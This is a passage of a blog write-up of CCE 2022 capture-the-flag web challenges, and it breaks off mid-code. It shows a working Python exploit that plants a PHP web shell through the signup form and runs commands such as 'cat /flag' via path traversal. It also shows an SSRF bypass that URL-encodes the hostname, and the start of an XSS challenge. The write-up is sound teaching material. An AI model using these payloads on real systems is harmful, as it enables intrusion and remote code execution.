<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Jeongwon Jo" />
  <meta name="description" content="" />
  
  
  <title>
    
      CCE 2022 Write Up 
      
      
      |
    
     Jeongwon Jo
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>

  </script>
<meta name="generator" content="Hexo 7.0.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Pocas</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="https://pocas.kr">
          <a target="_blank" rel="noopener" href="https://pocas.kr">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">CCE 2022 Write Up</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2022-09-25 04:00:53
        </span>
        
      </div>
      <div class="markdown-body">
        <p>After a long time I did ctf again. Actually, a few days ago, 김지섭님, a member of zer0pt, asked me to do CCE together, but I refused. The reason was because of work.</p>
<p>But I was able to find 5 XSS from ** by concentrating on my work. And maybe if i was with him, it would have been the first and last CCE general finals of my life XD</p>
<hr>
<h3 id="reborn-of-php"><a href="#reborn-of-php" class="headerlink" title="reborn of php"></a>reborn of php</h3><p>The reborn of php is challenge that triggers RCE via file upload. And the flag location is &#x2F;flag</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">if</span>(!<span class="title function_ invoke__">defined</span>(<span class="string">&#x27;__MAIN__&#x27;</span>)) <span class="keyword">exit</span>; <span class="meta">?&gt;</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Controller</span> </span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$board</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$action</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$board</span>, <span class="variable">$action</span></span>) </span>&#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;board = <span class="variable">$board</span>;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;action = <span class="variable">$action</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^[a-z0-9:.]+$/i&#x27;</span>, <span class="variable">$this</span>-&gt;board))&#123;</span><br><span class="line">                <span class="variable language_">$this</span>-&gt;board = <span class="string">&#x27;main&#x27;</span>;</span><br><span class="line">                <span class="variable language_">$this</span>-&gt;action = <span class="string">&#x27;index&#x27;</span>;</span><br><span class="line">           &#125;</span><br><span class="line">        &#125;</span><br><span class="line">       </span><br><span class="line">        <span class="function"><span class="keyword">function</span> <span class="title">process</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">            <span class="variable">$path</span> = <span class="string">&quot;<span class="subst">&#123;$this-&gt;board&#125;</span>/<span class="subst">&#123;$this-&gt;action&#125;</span>&quot;</span>;</span><br><span class="line">            </span><br><span class="line">            <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/php|html/i&#x27;</span>,  <span class="variable">$path</span>))&#123;</span><br><span class="line">                <span class="title function_ invoke__">alert</span>(<span class="string">&#x27;not invalid&#x27;</span>, <span class="string">&#x27;back&#x27;</span>);</span><br><span class="line">            &#125;           </span><br><span class="line"></span><br><span class="line">            <span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;pages/&#x27;</span>);</span><br><span class="line">            <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="string">&quot;<span class="subst">&#123;$path&#125;</span>.php&quot;</span>)) <span class="variable">$path</span> = <span class="string">&#x27;main/index&#x27;</span>;</span><br><span class="line">            <span class="keyword">include</span>(<span class="string">&quot;<span class="subst">&#123;$path&#125;</span>.php&quot;</span>);</span><br><span class="line">       &#125;     </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// /var/www/html/lib/controller.lib.php</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="title function_ invoke__">define</span>(<span class="string">&#x27;__MAIN__&#x27;</span>, <span class="literal">true</span>);</span><br><span class="line">    <span class="keyword">include</span>(<span class="string">&#x27;lib/controller.lib.php&#x27;</span>);</span><br><span class="line">    <span class="keyword">include</span>(<span class="string">&#x27;lib/util.lib.php&#x27;</span>);</span><br><span class="line">        </span><br><span class="line">    <span class="variable">$board</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>] ? <span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>] : <span class="string">&#x27;main&#x27;</span> ;</span><br><span class="line">    <span class="variable">$action</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>] ? <span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>] : <span class="string">&#x27;index&#x27;</span>;</span><br><span class="line">   </span><br><span class="line">    <span class="variable">$controller</span> = <span class="keyword">new</span> <span class="title class_">Controller</span>(<span class="variable">$board</span>, <span class="variable">$action</span>);</span><br><span class="line">    <span class="variable">$controller</span>-&gt;<span class="title function_ invoke__">process</span>();</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// /var/www/html/index.php</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>This is code of index.php and controller.lib.php. In the index.php, It takes parameters and passes them to the Controller constructor. An LFI vulnerability exists in the process() method of Controller. If we can create arbitrary php files on the server we can trigger RCE.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">save_user_id</span>(<span class="params"><span class="variable">$id</span>, <span class="variable">$pw</span></span>)</span>&#123;</span><br><span class="line">    <span class="title function_ invoke__">chdir</span>(<span class="string">&#x27;../&#x27;</span>);</span><br><span class="line">    <span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;dbs/<span class="subst">&#123;$id&#125;</span>&quot;</span>, <span class="title function_ invoke__">serialize</span>(<span class="variable">$pw</span>));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// /var/www/html/lib/util.lib.php</span></span><br></pre></td></tr></table></figure>
<p>A vulnerability exists in the save_user_id() function that can create arbitrary files. Also, this function is fired when registering as a member. And the file creation path is under &#x2F;var&#x2F;www&#x2F;html&#x2F;dbs&#x2F;</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">if</span>(!<span class="title function_ invoke__">defined</span>(<span class="string">&#x27;__MAIN__&#x27;</span>)) <span class="keyword">die</span>(<span class="string">&#x27;Access denied&#x27;</span>); <span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$id</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">    <span class="variable">$pw</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;pw&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!<span class="variable">$id</span> || !<span class="variable">$pw</span>) <span class="title function_ invoke__">alert</span>(<span class="string">&#x27;invalid input&#x27;</span>, <span class="string">&#x27;back&#x27;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">is_valid_id</span>(<span class="variable">$id</span>)) <span class="title function_ invoke__">alert</span>(<span class="string">&#x27;invalid id&#x27;</span>, <span class="string">&#x27;back&#x27;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">is_exists_user</span>(<span class="variable">$id</span>))&#123;</span><br><span class="line">        <span class="title function_ invoke__">alert</span>(<span class="string">&#x27;already joined&#x27;</span>, <span class="string">&#x27;back&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">save_user_id</span>(<span class="variable">$id</span>, <span class="variable">$pw</span>);</span><br><span class="line"></span><br><span class="line">    <span class="title function_ invoke__">alert</span>(<span class="string">&#x27;welcome&#x27;</span>, <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">    <span class="comment">// /var/www/html/pages/register.php</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>We can upload the PHP file because we do not validate the user id parameter in the signup logic.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests </span><br><span class="line"><span class="keyword">import</span> string </span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"></span><br><span class="line">CHALLURL = <span class="string">&quot;http://3.37.8.189:5580&quot;</span></span><br><span class="line"></span><br><span class="line">LENGTH = <span class="number">5</span></span><br><span class="line">CONTENT = <span class="string">&quot;&lt;?php echo system($_GET[&#x27;x&#x27;]);?&gt;&quot;</span></span><br><span class="line">string_pool = string.digits</span><br><span class="line">filename = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(LENGTH):</span><br><span class="line">    filename += random.choice(string_pool) </span><br><span class="line"></span><br><span class="line">FILENAME = filename + <span class="string">&#x27;.php&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&#x27;[+] FILANAME : <span class="subst">&#123;FILENAME&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line">requests.post(CHALLURL + <span class="string">&quot;/?b=register&amp;a=register&quot;</span>, data=&#123;<span class="string">&#x27;id&#x27;</span>:FILENAME, <span class="string">&#x27;pw&#x27;</span>:CONTENT&#125;)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span>(<span class="number">1</span>):</span><br><span class="line">    payload = <span class="built_in">input</span>(<span class="string">&quot;[+] Enter the command : &quot;</span>)</span><br><span class="line">    RESULT = requests.get(CHALLURL + <span class="string">f&#x27;/?b=login&amp;a=../../dbs/<span class="subst">&#123;filename&#125;</span>&amp;x=<span class="subst">&#123;payload&#125;</span>&#x27;</span>).text</span><br><span class="line">    <span class="built_in">print</span>(RESULT)</span><br></pre></td></tr></table></figure>
<p>I wrote the exploit code as above.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">❯ python3 poc.py   </span><br><span class="line">[+] FILANAME : 37106.php</span><br><span class="line">[+] Enter the command : id</span><br><span class="line"></span><br><span class="line">s:32:&quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)</span><br><span class="line">uid=33(www-data) gid=33(www-data) groups=33(www-data)&quot;;</span><br><span class="line">[+] Enter the command : cat /flag</span><br><span class="line"></span><br><span class="line">s:32:&quot;cce2022&#123;ce9237924b58afdf2a164345ddd8265e49f210abc75ab12002eb6f6a32109d293a992b99214eae312f9f33131458dbc0e8c17485364fec867a241b1b&#125;</span><br><span class="line">cce2022&#123;ce9237924b58afdf2a164345ddd8265e49f210abc75ab12002eb6f6a32109d293a992b99214eae312f9f33131458dbc0e8c17485364fec867a241b1b&#125;&quot;;</span><br></pre></td></tr></table></figure>


<hr>
<h3 id="BabyWeb"><a href="#BabyWeb" class="headerlink" title="BabyWeb"></a>BabyWeb</h3><p>This is a challenge of SSRF using different URL parsing methods.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>,<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&quot;POST&quot;</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            url = request.form[<span class="string">&#x27;url&#x27;</span>]</span><br><span class="line">            result = urllib.parse.urlparse(url)</span><br><span class="line">            <span class="keyword">if</span> result.hostname == <span class="string">&#x27;flag.service&#x27;</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="string">&quot;Not allow&quot;</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="keyword">if</span>(valid_ip(result.hostname)):</span><br><span class="line">                    <span class="keyword">return</span> <span class="string">&quot;huh??&quot;</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    <span class="keyword">return</span> requests.get(<span class="string">&quot;http://&quot;</span>+result.hostname+result.path, allow_redirects=<span class="literal">False</span>).text</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&quot;Something wrong...&quot;</span></span><br><span class="line">    <span class="keyword">elif</span> request.method == <span class="string">&quot;GET&quot;</span>:</span><br><span class="line">        <span class="keyword">return</span> data</span><br></pre></td></tr></table></figure>
<p>Looking at the code, hostname should not be flag.service. And it must be a valid IP.</p>
<figure class="highlight docker"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">version: <span class="string">&#x27;3&#x27;</span></span><br><span class="line">services:</span><br><span class="line">  challenge:</span><br><span class="line">    build:</span><br><span class="line">      context: .</span><br><span class="line">      dockerfile: ./public/Dockerfile</span><br><span class="line">    ports: </span><br><span class="line">      - <span class="string">&quot;80:80&quot;</span></span><br><span class="line">    links:</span><br><span class="line">      - flag.service</span><br><span class="line">  flag.service:</span><br><span class="line">    build:</span><br><span class="line">      context: .</span><br><span class="line">      dockerfile: ./internal/Dockerfile</span><br><span class="line">  </span><br></pre></td></tr></table></figure>
<p>However, since the URL of the internal server is flag.service, you need to send a request to flag.service.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> secret <span class="keyword">import</span> FLAG</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/flag&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">if</span> request.host == <span class="string">&quot;flag.service&quot;</span>:</span><br><span class="line">        <span class="keyword">return</span> FLAG</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Nice try :)&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&quot;0.0.0.0&quot;</span>, port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>
<p>We can get the flags by sending a request to <a target="_blank" rel="noopener" href="http://flag.service/flag">http://flag.service/flag</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">CHALLURL = <span class="string">&#x27;http://localhost/&#x27;</span> <span class="comment"># http://3.38.33.163/</span></span><br><span class="line">hostname = <span class="string">&#x27;&#x27;</span></span><br><span class="line">parse_hostname = <span class="built_in">list</span>(<span class="string">&#x27;flag.service&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> s <span class="keyword">in</span> parse_hostname:</span><br><span class="line">    hostname += <span class="built_in">hex</span>(<span class="built_in">ord</span>(s)).replace(<span class="string">&#x27;0x&#x27;</span>,<span class="string">&#x27;%&#x27;</span>)</span><br><span class="line"></span><br><span class="line">url = <span class="string">f&#x27;http://<span class="subst">&#123;hostname&#125;</span>/flag&#x27;</span></span><br><span class="line"><span class="built_in">print</span>(url)</span><br><span class="line"></span><br><span class="line">FLAG = requests.post(CHALLURL, data=&#123;<span class="string">&#x27;url&#x27;</span>:url&#125;).text</span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&#x27;FLAG is <span class="subst">&#123;FLAG&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">http://%66%6c%61%67%2e%73%65%72%76%69%63%65/flag</span></span><br><span class="line"><span class="string">FLAG is cce2022&#123;this_is_not_real_flag&#125;</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br></pre></td></tr></table></figure>
<p>This can be easily solved as above. When parsing a url, the hostname is parsed in the url-encoded state, but when sending a request, the url-encoded hostname is decoded.</p>
<hr>
<h3 id="blue-archive-web"><a href="#blue-archive-web" class="headerlink" title="blue archive - web"></a>blue archive - web</h3><p>This is a challenge for using simple XSS.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> crypto = <span class="built_in">require</span>(<span class="string">&#x27;crypto&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> fs = <span class="built_in">require</span>(<span class="string">&#x27;fs&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> moment = <span class="built_in">require</span>(<span class="string">&#x27;moment&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> puppeteer = <span class="built_in">require</span>(<span class="string">&#x27;puppeteer&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> sandbox_url = <span class="string">`http://sandbox.bluearchive.kr:<span class="subst">$&#123;process.env.PORT&#125;</span>/?url=`</span></span><br><span class="line"><span class="keyword">const</span> config = <span class="built_in">require</span>(<span class="string">&#x27;./config&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">saveArchive</span>(<span class="params">url</span>) &#123;</span><br><span class="line">    <span class="keyword">const</span> hash = crypto.<span class="title function_">createHmac</span>(<span class="string">&#x27;sha256&#x27;</span>, config.<span class="property">SECRET</span>).<span class="title function_">update</span>(url).<span class="title function_">digest</span>(<span class="string">&#x27;hex&#x27;</span>);</span><br><span class="line">    <span class="keyword">const</span> archive_dir = <span class="string">`<span class="subst">$&#123;config.ARCHIVE_DIR&#125;</span>/<span class="subst">$&#123;hash&#125;</span>`</span>;</span><br><span class="line">    <span class="keyword">if</span> (!fs.<span class="title function_">existsSync</span>(archive_dir))</span><br><span class="line">        fs.<span class="title function_">mkdirSync</span>(archive_dir);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">const</span> timestamp = <span class="title function_">moment</span>().<span class="title function_">format</span>(<span class="string">&#x27;YYYYMMDDHHmmssSSS&#x27;</span>);</span><br><span class="line">    <span class="keyword">const</span> archive_path = <span class="string">`<span class="subst">$&#123;archive_dir&#125;</span>/<span class="subst">$&#123;timestamp&#125;</span>.<span class="subst">$&#123;config.ARCHIVE_EXT&#125;</span>`</span>;</span><br><span class="line">    <span class="keyword">const</span> browser = <span class="keyword">await</span> puppeteer.<span class="title function_">launch</span>(&#123;</span><br><span class="line">        <span class="attr">executablePath</span>: <span class="string">&#x27;./chrome/chrome&#x27;</span>,</span><br><span class="line">        <span class="attr">ignoreDefaultArgs</span>: <span class="literal">true</span>,</span><br><span class="line">        <span class="attr">args</span>: [</span><br><span class="line">            <span class="string">&#x27;--headless&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;--diable-gpu&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;--disable-dev-shm-usage&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;--ignore-certificate-errors&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;--hide-scrollbars&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;--window-size=1280,720&#x27;</span>,</span><br><span class="line">            <span class="string">&quot;--js-flags=--noexpose_wasm,--jitless&quot;</span></span><br><span class="line">        ],</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="keyword">const</span> page = <span class="keyword">await</span> browser.<span class="title function_">newPage</span>();</span><br><span class="line">    <span class="keyword">await</span> page.<span class="title function_">goto</span>(sandbox_url + url, &#123; <span class="attr">timeout</span>: <span class="number">3000</span> &#125;);</span><br><span class="line">    <span class="keyword">await</span> <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">resolve</span> =&gt;</span> <span class="built_in">setTimeout</span>(resolve, <span class="number">3000</span>));</span><br><span class="line">    <span class="keyword">await</span> page.<span class="title function_">screenshot</span>(&#123;</span><br><span class="line">        <span class="attr">fullPage</span>: <span class="literal">true</span>,</span><br><span class="line">        <span class="attr">path</span>: archive_path,</span><br><span class="line">    &#125;);</span><br><span class="line">    <span class="keyword">await</span> browser.<span class="title function_">close</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = &#123; saveArchive &#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// /app/lib.js</span></span><br></pre></td></tr></table></figure>
<p>There is a function called saveArchive() in lib.js. This function uses puppeteer to open an arbitrary browser in the background. After that, the file-related logic is moved to the sandbox url after execution.</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">router.<span class="title function_">post</span>(<span class="string">&#x27;/archiveSave&#x27;</span>, <span class="keyword">async</span> (req, res) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; url &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">typeof</span> url !== <span class="string">&#x27;string&#x27;</span> ||</span><br><span class="line">        !(url.<span class="title function_">startsWith</span>(<span class="string">&#x27;http://&#x27;</span>) || url.<span class="title function_">startsWith</span>(<span class="string">&#x27;https://&#x27;</span>)))</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">400</span>).<span class="title function_">render</span>(<span class="string">&#x27;index&#x27;</span>, &#123; error : <span class="string">&#x27;Invalid URL.&#x27;</span> &#125;);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="keyword">await</span> <span class="title function_">saveArchive</span>(url);</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">status</span>(<span class="number">200</span>).<span class="title function_">render</span>(<span class="string">&#x27;index&#x27;</span>, &#123; success : <span class="string">`Sucessfully saved archive for <span class="subst">$&#123;url&#125;</span>`</span> &#125;);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">        <span class="variable 